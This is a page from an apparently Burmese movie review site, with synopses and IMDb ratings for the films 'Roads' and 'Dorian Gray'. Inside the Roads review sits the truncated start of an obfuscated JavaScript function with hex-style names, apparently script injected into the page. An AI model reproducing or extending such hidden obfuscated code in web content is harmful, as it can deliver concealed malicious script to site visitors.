Alpha Premium

Ben Chaplin

Roads 6.2
Roads Roads (2019) ============================= အသက် ၁၈ ၁၉ ဆိုတာ အိမ်မှာနေတာထက်ကို သူငယ်ချင်းတွေနဲ့ အတူတူ အပြင်မှာပဲနေချင်တဲ့အရွယ်ပေါ့။ ဒီကားလေးမှာက သူတို့က အပြင်မှာ ပျော်ဖို့ပါးဖို့ပဲ ထွက်တာမဟုတ်ပဲ ရည်မှန်းချက်ကိုယ်စီနဲ့ပါ။ မနေ့ကမှ အသက် ၁၉ နှစ်ပြည့်တဲ့သူက ပထွေးဆီက ဗန်ကားလေးကို ခိုးလာပြီး ပြင်သစ်ကို ခြေဆန့်ပါသတဲ့။ သူ့ရည်မှန်းချက်က အဖေကိုရှာဖို့ပါ။ လမ်းမှာ ကားပျက်ရင်း ဝီလီယမ် လို့ခေါ်တဲ့ လူမည်းကလေးနဲ့တွေ့ပါလေရော။ သူတို့လိုနေရာက လူဖြူ လူမည်း ပြသာနာတွေလည်းရှိလေတော့ အရမ်းလည်း မရင်းနှီးဘူးပေါ့။ ဝီလီယမ်လေးက နောက်လမှ ၁၈ နှစ်ပြည့်မှာပါ။ သူကလည်း သူ့နည်းသူ့ဟန်နဲ့ ပြင်သစ်ကို သွားမှာတဲ့ ဘာလုပ်ဖို့လည်းဆိုတော့ အကို ကိုရှာမှာတဲ့။ အဲ့ဒါနဲ့ မော်ရိုကို ဆိုတဲ့နေရာကနေ ပြင်သစ်ကို ဘယ်လိုသွားမလဲ လမ်းခရီးမှာရော ဘယ်လိုတွေကြုံရမလဲ သူတို့ရည်မှန်းထားတာနဲ့ရောထပ်တူကြပါရဲ့လား ဆိုတာကိုတော့ ဒီကားလေးနဲ့ပဲ အဖြေရှာကြည့်လိုက်တော့နော်။ အေးအေးလေးလေးနဲ့ အချိန်ပေးကြည့်ရင်တော့ အဆင်ပြေမယ့်ကားလေးတစ်ကားလို့ လက်တို့ချင်ပါတယ် ပရိသတ်ကြီးရေ။ ။ function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return ...
6.2
IMDB: 6.2/10 524 votes
movie

Roads

2019
Premium
Dorian Gray 6.3
Dorian Gray ဘယ်တော့မှ မအို၊မနာ၊မသေတဲ့ဆေး ဆိုတာလောကမှာ တကယ်ရှိရဲ့လား။ တကယ်လို့ရှိခဲ့ရင် သင်ရော ဒီဆေးကိုအသုံးပြုချင်ပါသလား။   Dorian Gray လို့နာမည်ရတဲ့ ဒီဇာတ်ကားလေးကတော့ 1890 တုန်းကထွက်ခဲ့တဲ့ The Picture of Dorian Gray ဆိုတဲ့ ရင်လှိုက်သဲဖိုဝတ္တုကို ပြန်လည်ရိုက်ကူးထားတဲ့ ဇာတ်ကားလေးပဲဖြစ်ပါတယ်။ ဒီကားလေးထဲမှာ Dorian Gray ဆိုတဲ့ အဘိုးရဲ့အမွေတွေကိုဆက်ခံဖို့ အင်္ဂလန်ကိုတက်လာတဲ့ ရိုးသားတဲ့လူငယ်လေးတစ်ဦးရဲ့ ဘဝအချိုးအကွေ့တွေနဲ့ မိတ်ဆွေအပေါင်းအသင်းကြောင့် ပင်ကိုယ်စရိုက်လက္ခဏာတွေပါ ပြောင်းလဲသွားတတ်ကြောင်းတွေကို အတွေးထဲစွဲကျန်နေအောင် တင်ဆက်ပြထားပါတယ်။ ဇာတ်လမ်းအကျဉ်းကိုပြောရရင်တော့... Gray ဟာ အင်္ဂလန်က အိမ်တော်ကြီးကို ရောက်လာပြီးမကြာခင်မှာ မိတ်ဆွေအသစ်တစ်ဦးက ပုံတူကားချပ်တစ်ချပ် ရေးဆွဲလက်ဆောင်ပေးခဲ့ပါတယ်။ အဲဒီပုံတူပန်းချီကားချပ်ကြီးဟာ Gray နဲ့ချွပ်စွပ်တူရုံမက သေသေချာချာစိုက်ကြည့်ရင် အသက်ဝင်နေသယောင်ပါ ထင်မှတ်မှားစေတဲ့အထိဖြစ်စေပါတယ်။ အစပိုင်းမှာတော့ သာမန်ပန်းချီကားအနေနဲ့သာရှိနေခဲ့ပေမယ့် Gray တစ်ခုခုထိခိုက်အနာတရဖြစ်ပြီးတိုင်း အနာဖြစ်တဲ့နေရာကနေ ပန်းချီကားပေါ်မှာ အဲဒီအနာလိုမျိုးပြန်ပေါ်လာပြီးရင် Gray ဟာ ပကတိအကောင်းအတိုင်းပြန်ဖြစ်သွားလေ့ရှိပါတယ်။ ခဏခဏနဲ့ ဖြစ်ဖန်များလာတော့ ...
6.3
IMDB: 6.3/10 59,400 votes
movie

Dorian Gray

2009

Release year

Genres

Release year